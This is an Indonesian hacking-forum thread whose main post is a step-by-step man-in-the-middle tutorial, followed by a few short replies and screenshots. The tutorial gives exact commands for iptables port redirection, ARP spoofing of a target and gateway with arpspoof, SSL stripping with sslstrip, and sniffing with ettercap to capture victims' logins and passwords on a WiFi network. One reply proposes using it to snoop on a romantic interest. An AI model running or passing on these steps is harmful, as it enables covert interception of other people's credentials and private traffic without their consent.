(04-29-2016, 08:15 AM)teh Wrote: test on kang, lmayan buat kepo si doi hihihi
(05-02-2016, 03:21 AM)owl Wrote:(04-29-2016, 04:13 AM)Nue Bhandell Wrote: awkkaw post dulu sebelum shalat jumat :heart:
awkkaw , binggung mau buat judulnya jadii apaan, ya gitu aja deh jadinya, dan btw kira2 salah room gak nih thread ? lanjut deh
kali ini sedikit nyicip teknik MiTM ,, Apa itu ??
Serangan Man in The Middle (MiTM) adalah salah satu serangan hacking yang dilakukan dari dalam jaringan untuk melakukan penyadapan informasi dengan cara membelokkan jalur koneksi dimana penyerang berada di antara dua target yang sedang melakukan komunikasi *kira2begitu
Pertama kita buka terlebih dahulu konfigurasi ettercap yang berada di folder /etc/ettercap/ kita buka menggunkan leafpad
leafpad /etc/ettercap/etter.conf
selanjutnya cari kata # if you use iptables: kemudian hilangkan tanda pagar di depan redir_command_on dan redir_command_off (cek SS dibawah)
selanjutnya kita aktifkan IP Forward dengan perintah
echo 1 > /proc/sys/net/ipv4/ip_forward
kemudian redirect port 80 ke 10000, agar koneksi pada port default akses web (80) kita redirect ke port SSLSTRIP yang kita gunakan untuk menterjemahkan akses HTTPS ke HTTP, dengan perintah
iptables -t nat -A PREROUTING -p tcp --destination-port 80 -j REDIRECT --to-port 10000
sebelum ke tahap selanjutnya kita harus mengatahui ip gateway dan ip target terlebih dahulu,
untuk mengetahui ip gateway cukup ketikkan di terminal
route -n
selanjutnya untuk mengetahui ip target disini saya menggunakan angry ip scanner, kalian juga bisa menggunakan autoscan-network, nmap dan sebagainya
disini saya sudah mendapatkan target yg sedang aktif di jaringan wifi
Selanjutnya lakukan spoof arp menggunakan arpspoof
arpspoof -i wlan0 -t 192.168.1.102 192.168.1.254
keterangan:
wlan0 : jenis interface yang digunakan
192.168.1.102 : Ip target
192.168.1.254 : ip gateway
Sejanjutnya buka terminal baru untuk menjalankan sslstrip, perintahnya
sslstrip -akf
Buka terminal baru lagi untuk melakukan sniffing dengan menggunakan ettercap
ettercap -T -q -i wlan0 -M arp // //
Jadi nanti jika target mengakses situs-situs yang memerlukan login, akan muncul detail user dan password serta link situs yang dia buka, di bawah Hit.
Seperti ini
xixixhi ,, maaf ya gan kalo tutor basi :D dan kalo ada kesalahan mohon dibenarkan di kolom komentar beb :heart:
Postingan berikut dibuat hanya sebagai pembelajaran saja ya bro, jadi jangan di salah gunakan, gunakan ilmu dengan bijak ;)
Kunjungin juga gengs TKJ Cyber Art
SUMUR
nice kang
![[Image: 13120586_783857848415237_969346868_o.png...e=5725BEA7]](https://scontent-sit4-1.xx.fbcdn.net/v/t35.0-12/13120586_783857848415237_969346868_o.png?oh=638ff2e56c9be35fccd65f11e6389f77&oe=5725BEA7)
![[Image: 13091868_783857881748567_485575617_o.png...e=57250997]](https://scontent-sit4-1.xx.fbcdn.net/v/t35.0-12/13091868_783857881748567_485575617_o.png?oh=0117ddb956831ab0a6cac3b4a2c1f5b3&oe=57250997)
![[Image: 13090708_783857885081900_895853354_o.png...e=572507D9]](https://scontent-sit4-1.xx.fbcdn.net/hphotos-xlp1/v/t35.0-12/13090708_783857885081900_895853354_o.png?oh=558cef20d369bb2c2d4270dc2aed0927&oe=572507D9)
![[Image: 13090768_783857921748563_753369840_o.png...e=5725BA25]](https://scontent-sit4-1.xx.fbcdn.net/v/t35.0-12/13090768_783857921748563_753369840_o.png?oh=2c3a86fbdef3aed2cf8d52895a6d507a&oe=5725BA25)
![[Image: 13091574_783858021748553_122467338_o.png...e=5724B2AB]](https://scontent-sit4-1.xx.fbcdn.net/v/t35.0-12/13091574_783858021748553_122467338_o.png?oh=c2577f5377acbecdd62f234db83d2284&oe=5724B2AB)